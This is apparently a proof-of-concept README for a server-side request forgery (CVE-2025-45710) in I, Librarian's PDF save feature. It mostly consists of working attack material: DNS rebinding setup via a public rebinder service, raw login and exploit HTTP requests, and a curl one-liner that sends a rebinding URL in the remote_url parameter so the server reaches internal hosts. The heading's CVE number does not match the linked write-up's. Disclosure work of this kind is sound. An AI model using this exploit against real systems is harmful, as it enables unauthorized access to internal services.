# CVE-2025-45710

Read more details on:
[https://www.partywave.site about CVE-2024-54819](https://www.partywave.site/show/research/CVE-2024-54819_-_I_Librarian_Server_Side_Request_Forgery)

## Setup a rebinder
This is just an example with an available web service at the time of writing.

- go to https://lock.cmpxchg8b.com/rebinder.html
- select the 2 addresses to switch on (A,B)
- test the rebinding, randomly returns A or B
```bash
host NAMEHEXA.NAMEHEXB.rbndr.us # IP A
host NAMEHEXA.NAMEHEXB.rbndr.us # IP A
host NAMEHEXA.NAMEHEXB.rbndr.us # IP B
....
```
- login and perform the vulnerable request

## POST request to login

The attacker must be logged

```bash
POST /librarian/index.php/authentication HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
[removed ...]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Client-Width: 1920
X-Requested-With: XMLHttpRequest
Content-Length: 110
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/librarian/
Cookie: IL=[LIBRARIAN COOKIE] # for example: IL=poscnjta68n2691tehd5gt9k9e
[removed ...]

username=[USERNAME]&password=[PASSWORD]&csrfToken=[CSRF_TOKEN]
```

## POST request to save PDF

```remote_url parameter``` is vulnerable to its weak validation

```bash
POST /librarian/index.php/pdf/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
[removed ...]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Client-Width: 1920
X-Requested-With: XMLHttpRequest
Content-Length: 135
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/librarian/index.php/item
Cookie: IL=[LIBRARIAN COOKIE] # for example: IL=9eb3bba4c54177fcb9bff0e90ab7a94c
[removed ...]

remote_url=[REBINDER_PAYLOAD]&id=[PDF_ID]&csrfToken=[CSRF_TOKEN]
```

## Bash one-liner

This one-liner is an example with example values to exploit the Server Side Request Forgery:

```bash
curl -X POST http://127.0.0.1/librarian/index.php/pdf/save -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: IL=9eb3bba4c54177fcb9bff0e90ab7a94c" --data-urlencode "remote_url=http://0a00020f.c0a80001.rbndr.us:6565" --data-urlencode "id=1" --data-urlencode "csrfToken=55ec3f2fb1d91c2900db66997079e204360636359681cc9f9900179fb0c58f59" --proxy http://127.0.0.1:8080
```

![ssrf-burp](https://github.com/user-attachments/assets/e716ff7a-3878-434e-a286-33787e3c590f)

And 

![rebinder](https://github.com/user-attachments/assets/ed339dd0-aff3-4d98-913e-05f5472e2064)



